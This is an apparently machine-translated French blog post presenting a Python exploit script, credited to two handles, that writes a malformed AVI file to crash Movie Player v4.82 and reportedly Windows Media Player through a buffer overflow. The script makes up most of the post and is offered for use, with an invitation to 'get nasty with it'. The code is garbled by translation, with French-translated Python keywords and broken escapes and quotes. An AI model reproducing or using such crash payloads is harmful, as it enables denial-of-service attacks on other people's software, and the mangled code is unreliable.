Je suis tombé sur un débordement de tampon intéressant exploit qui exploite la vulnérabilité de la mémoire dans Movie Player et 
peut également être utilisée avec succès contre le Lecteur Windows Media. L'exploit peut être utilisé pour effectuer uneattaque de type déni de service et les causes crash de l'application. Pour ceux qui ne connaissent pas de Dépassement de Tampon , peuvent lire l'article ici .
Si fonctionner correctement, de nombreuses fois, il ya un accident tous les temps chaque fois que la victime ouvre le dossier dans lequel est placé la vulnérabilité. Voici l'exploit codé par ^ Xecuti0N3r & d3M0l! tioN3r
#! / Usr / bin / python
# (+) Exploit Titre: Movie Player v4.82 0day débordement de tampon / DOS Exploit
# (+) Link Software:http://www.movieplay.org/download.php
# (+) Logiciel: Movie Player
# (+) Version: v4.82
# (+) Testé sur: WIN-XP SP3
# (+) Date: 31.03.2011
# (+) Heure: 3:37 pm
# Bug similaire a été trouvé par cr4wl3r dans MediaPlayer Classic
print "_______________________________________________________________________";
print "(+) Exploit Titre: Movie Player v4.82 0day débordement de tampon / DOS Exploit";
print "(+) Link Software:http://www.movieplay.org/download.php ";
print "(+) Logiciel: Movie Player";
print "(+) Version: v4.82»;
print "(+) Testé sur: WIN-XP SP3";
print "(+) Date: 31.03.2011";
print "(+) Heure: 13:37 PM";
imprimer "____________________________________________________________________ \ n ";
moment de l'importation
time.sleep (2);
print "\ nGenerating l'exploit !!!"; fichier
time.sleep (2);
print "\ n \ fichier généré nMoviePlayerExploit.avi!";
time.sleep (2);
ExploitLocation = "C: \ \ MoviePlayerExploit.avi"
f = open (ExploitLocation, "wb")
memoryloc = '\ X4D \ x54 \ x68 \ x64 \ x00 \ x00 \ x00 \ x06 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 ";
f.write (memoryloc)
f.close ()
print "\ n \ n (+) Fait \ n!";
print "(+) Maintenant vous suffit d'ouvrir MoviePlayerExploit.avi avec Movie Player et Kaboooommm;!) \ n";
print "(+) La plupart du temps il ya un crash \ n chaque fois que vous ouvrez le dossier où est stocké le MoviePlayerExploit.avi: D \ n";
time.sleep (2);
time.sleep (1);
print "\ n \ ########################################## n \ n ############################## \ n (+) Exploit Codé par: Xecuti0N3r ^ & d3M0l tioN3r \ n ";!
"(+)^ Impression Xecuti0N3r: E-mail \ n ";
print "(+) d3M0l tioN3r: E-mail \ n!";
print "(+) Merci spécial à:! MaxCaps & aNnIh LatioN3r \ n";
"################################################ D'impression ######################## \ n \ n ";
time.sleep (4);
Vous avez besoin de Python pour le compiler, une fois compilé, vous pouvez le tester sur une machine virtuelle. Essayez de l'ouvrir en utilisant Windows Media Player, il va se planter sur le coup. L'ingénieux de plus vous pouvez obtenir méchant avec elle:)
.. cheers
Aucun commentaire:
Enregistrer un commentaire